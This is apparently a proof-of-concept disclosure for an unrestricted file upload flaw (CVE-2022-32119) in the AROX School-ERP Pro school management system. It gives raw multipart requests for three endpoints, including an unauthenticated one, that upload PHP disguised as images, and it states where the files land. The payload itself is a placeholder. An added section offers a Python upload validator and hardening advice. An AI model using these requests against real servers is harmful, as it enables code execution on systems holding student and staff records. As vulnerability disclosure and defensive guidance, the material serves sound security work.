CVE-2022-32119 PoC — AROX School-ERP Pro Code Issue Vulnerability

Source
Associated Vulnerability
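Title: AROX School-ERP Pro Code Issue Vulnerability (CVE-2022-32119)
Description: AROX School-ERP Pro is a web-based school management system. It includes course management, attendance management, financial management, human resources management, and examination management. AROX School-ERP Pro v1.0 contains a security vulnerability that attackers can exploit to upload arbitrary files.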
Description
CVE-2022-32119 - Arox-Unrestricted-File-Upload
Readme
# CVE-2022-32119 - Arox-Unrestricted-File-Upload

There are multiple unrestricted file uploads that result in the arbitrary execution of PHP code.

## Authenticated Vulnerable Pages:


#### localhost/office_admin/?pid=54&action=add

```
-----------------------------181967832439954202373233921976
Content-Disposition: form-data; name="apid"

2
-----------------------------181967832439954202373233921976
Content-Disposition: form-data; name="title"

Test
-----------------------------181967832439954202373233921976
Content-Disposition: form-data; name="image_path"; filename="phpfilehere.php.jpg"
Content-Type: image/jpeg

<PHP Code Here>
-----------------------------181967832439954202373233921976
Content-Disposition: form-data; name="addphoto"

Add
-----------------------------181967832439954202373233921976--

File location: localhost/office_admin/images/student_photos/<file here>
```


  
#### localhost/office_admin/?pid=22&action=school_details

```
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_startdate"

06/04/2022
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_enddate"

07/04/2022
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_ac_startdate"

06/04/2022
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_ac_enddate"

07/04/2022
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_schoolname"

Test
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_currency"

Test
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_symbol"

test
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_address"

Test
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_endclass"


-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_email"

info@test.com
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_phoneno"

1234567899
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_website"

www.test.com
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="fi_school_logo"; filename="phpfilehere.php"
Content-Type: image/jpeg

<PHP Code Here>
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="oldlogoimage"

oldimage.jpg
-----------------------------11158482814295139764067111151
Content-Disposition: form-data; name="Submit"

Submit
-----------------------------11158482814295139764067111151--

File location: localhost/office_admin/images/school_logo/<file here>
```


## Unauthenticated Vulnerable Pages:

#### localhost/greatbritain/greatbritain/upload_stafffille.php

```
-----------------------------80149291128776956634294289925
Content-Disposition: form-data; name="txtdocname"; filename="test.jpg"
Content-Type: image/jpeg

123456
-----------------------------80149291128776956634294289925
Content-Disposition: form-data; name="btnsubmit"

Submit
-----------------------------80149291128776956634294289925--

File location: localhost/greatbritain/greatbritain/upload_data/<file here>
```
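
All three requests above declare `Content-Type: image/jpeg`, a value the client controls, while the filename and body are anything but an image. The following is an added example, not code from this README or from AROX School-ERP Pro: a sketch of the server-side check an upload handler needs, run against constructed samples modelled on the three file parts shown above. The function name, allow-list and sample bytes are assumptions made for illustration.

```python
import os
import secrets

# Assumption: photo/logo uploads only need JPEG and PNG. Magic bytes per extension.
SIGNATURES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
SCRIPT_MARKER = b"<?php"  # heuristic only; never the sole control


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (ok, reason, stored_name). declared_type is accepted but never trusted."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    # Exactly one dot: rejects "x.php.jpg", extensionless names and dotfiles.
    if len(parts) != 2 or not parts[0]:
        return False, "name must be exactly <stem>.<ext>", None
    ext = parts[1]
    if ext not in SIGNATURES:
        return False, f"extension .{ext} not allowed", None
    if not data.startswith(SIGNATURES[ext]):
        return False, "content does not match extension", None
    if SCRIPT_MARKER in data.lower():
        return False, "embedded script marker", None
    # Server-generated name: nothing from the client reaches the filesystem path.
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


# Constructed samples: (filename, client-declared type, body) as in the requests above.
SAMPLES = [
    ("phpfilehere.php.jpg", "image/jpeg", b"<PHP Code Here>"),
    ("phpfilehere.php", "image/jpeg", b"<PHP Code Here>"),
    ("test.jpg", "image/jpeg", b"123456"),
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),  # JPEG header
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        ok, reason, stored = validate_upload(name, ctype, body)
        print(f"{name:22} declared={ctype:10} -> {'ACCEPT' if ok else 'REJECT'} ({reason})")
```

Validation is one layer: the upload directories named above (`images/student_photos`, `images/school_logo`, `upload_data`) should also be served with script execution disabled, and the upload endpoints should require authentication.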
File Snapshot

```
[4.0K] /data/pocs/b424466a78d9b8b4646c0f4bac856716740d4765
└── [3.5K] README.md

0 directories, 1 file
```